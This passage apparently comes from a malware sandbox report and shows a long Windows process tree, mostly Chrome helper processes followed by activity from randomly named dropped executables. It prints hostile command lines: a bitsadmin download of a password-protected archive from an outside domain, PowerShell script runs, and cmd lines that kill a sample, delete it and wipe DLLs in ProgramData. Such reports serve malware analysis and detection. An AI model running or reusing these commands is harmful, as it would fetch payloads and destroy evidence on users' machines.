                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4724 /prefetch:8
                                                                      4⤵
                                                                        PID:5344
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 /prefetch:8
                                                                        4⤵
                                                                          PID:5568
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3772 /prefetch:8
                                                                          4⤵
                                                                            PID:5276
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5700 /prefetch:8
                                                                            4⤵
                                                                              PID:1748
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5628 /prefetch:8
                                                                              4⤵
                                                                              • Drops file in Program Files directory
                                                                              PID:4812
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3524 /prefetch:8
                                                                              4⤵
                                                                                PID:992
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5844 /prefetch:8
                                                                                4⤵
                                                                                  PID:1772
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=724 /prefetch:8
                                                                                  4⤵
                                                                                    PID:5712
                                                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                    4⤵
                                                                                      PID:5720
                                                                                      • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6ec27a890,0x7ff6ec27a8a0,0x7ff6ec27a8b0
                                                                                        5⤵
                                                                                          PID:2352
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6028 /prefetch:8
                                                                                        4⤵
                                                                                          PID:1896
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5604 /prefetch:8
                                                                                          4⤵
                                                                                            PID:1840
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3824 /prefetch:8
                                                                                            4⤵
                                                                                              PID:4172
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4204 /prefetch:8
                                                                                              4⤵
                                                                                                PID:964
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5828 /prefetch:8
                                                                                                4⤵
                                                                                                  PID:2176
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 /prefetch:8
                                                                                                  4⤵
                                                                                                    PID:3996
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3980 /prefetch:8
                                                                                                    4⤵
                                                                                                      PID:5280
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3628 /prefetch:8
                                                                                                      4⤵
                                                                                                        PID:5352
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5308 /prefetch:8
                                                                                                        4⤵
                                                                                                          PID:4756
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5332 /prefetch:8
                                                                                                          4⤵
                                                                                                            PID:5408
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5492 /prefetch:8
                                                                                                            4⤵
                                                                                                              PID:5564
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4972 /prefetch:8
                                                                                                              4⤵
                                                                                                                PID:5276
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5096 /prefetch:8
                                                                                                                4⤵
                                                                                                                  PID:5136
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5576 /prefetch:8
                                                                                                                  4⤵
                                                                                                                    PID:4084
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3660 /prefetch:8
                                                                                                                    4⤵
                                                                                                                      PID:2804
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6436 /prefetch:8
                                                                                                                      4⤵
                                                                                                                        PID:5320
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6632 /prefetch:8
                                                                                                                        4⤵
                                                                                                                          PID:5128
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3848 /prefetch:8
                                                                                                                          4⤵
                                                                                                                            PID:4888
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6780 /prefetch:8
                                                                                                                            4⤵
                                                                                                                              PID:4784
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6972 /prefetch:8
                                                                                                                              4⤵
                                                                                                                                PID:3956
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6956 /prefetch:8
                                                                                                                                4⤵
                                                                                                                                  PID:4736
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6800 /prefetch:8
                                                                                                                                  4⤵
                                                                                                                                    PID:3336
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6856 /prefetch:8
                                                                                                                                    4⤵
                                                                                                                                      PID:4160
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6848 /prefetch:8
                                                                                                                                      4⤵
                                                                                                                                        PID:5972
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6840 /prefetch:8
                                                                                                                                        4⤵
                                                                                                                                          PID:1328
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6832 /prefetch:8
                                                                                                                                          4⤵
                                                                                                                                            PID:3636
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6824 /prefetch:8
                                                                                                                                            4⤵
                                                                                                                                              PID:5784
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5436 /prefetch:8
                                                                                                                                              4⤵
                                                                                                                                                PID:1096
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6340 /prefetch:8
                                                                                                                                                4⤵
                                                                                                                                                  PID:5824
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6328 /prefetch:8
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4744
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5576 /prefetch:8
                                                                                                                                                    4⤵
                                                                                                                                                      PID:5984
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3704 /prefetch:8
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5964
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5612 /prefetch:8
                                                                                                                                                        4⤵
                                                                                                                                                          PID:5200
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6596 /prefetch:1
                                                                                                                                                          4⤵
                                                                                                                                                            PID:4268
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
                                                                                                                                                            4⤵
                                                                                                                                                              PID:4060
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1808,13712348658998045864,9162638160913568992,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4160
                                                                                                                                                          • C:\Users\Admin\Documents\sdjjz4xWJ2aqyEopvxkRGT5P.exe
                                                                                                                                                            "C:\Users\Admin\Documents\sdjjz4xWJ2aqyEopvxkRGT5P.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                            PID:4612
                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc876E.tmp\tempfile.ps1"
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4556
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc876E.tmp\tempfile.ps1"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3808
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc876E.tmp\tempfile.ps1"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5568
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc876E.tmp\tempfile.ps1"
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:4536
                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc876E.tmp\tempfile.ps1"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4448
                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc876E.tmp\tempfile.ps1"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:300
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc876E.tmp\tempfile.ps1"
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Checks for any installed AV software in registry
                                                                                                                                                                          PID:96
                                                                                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                          "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Download via BitsAdmin
                                                                                                                                                                          PID:5060
                                                                                                                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:988
                                                                                                                                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:7260
                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc876E.tmp\tempfile.ps1"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2460
                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc876E.tmp\tempfile.ps1"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:7408
                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc876E.tmp\tempfile.ps1"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:5492
                                                                                                                                                                                • C:\Users\Admin\Documents\2zsfF94qyguwbdzHrV_dqbBP.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\2zsfF94qyguwbdzHrV_dqbBP.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                  PID:4512
                                                                                                                                                                                • C:\Users\Admin\Documents\L2euLs0359vI6IkX_mANgf9O.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\L2euLs0359vI6IkX_mANgf9O.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:4708
                                                                                                                                                                                  • C:\Users\Admin\Documents\L2euLs0359vI6IkX_mANgf9O.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\L2euLs0359vI6IkX_mANgf9O.exe" -a
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:4544
                                                                                                                                                                                • C:\Users\Admin\Documents\kOGrZqJq4giGwFsUN_D847M3.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\kOGrZqJq4giGwFsUN_D847M3.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                  PID:1792
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im kOGrZqJq4giGwFsUN_D847M3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\kOGrZqJq4giGwFsUN_D847M3.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                    PID:1800
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill /im kOGrZqJq4giGwFsUN_D847M3.exe /f
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:6052
                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                      PID:2100
                                                                                                                                                                                • C:\Users\Admin\Documents\jB2q1X2JFxA0MEEVPUrSq1rH.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\jB2q1X2JFxA0MEEVPUrSq1rH.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:5088
                                                                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                PID:1520
                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:2524
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3976.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3976.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                PID:5624
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im 3976.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\3976.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:1332
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill /im 3976.exe /f
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:4600
                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                      timeout /t 6
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                      PID:5724
                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                  PID:5536
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\E528.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\E528.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:3380
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\E73C.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\E73C.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:5416
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\F0A4.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\F0A4.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  PID:5764
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F0A4.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\F0A4.exe
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:4344
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\F596.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\F596.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:5640
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3EF.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\3EF.exe
                                                                                                                                                                                  1⤵
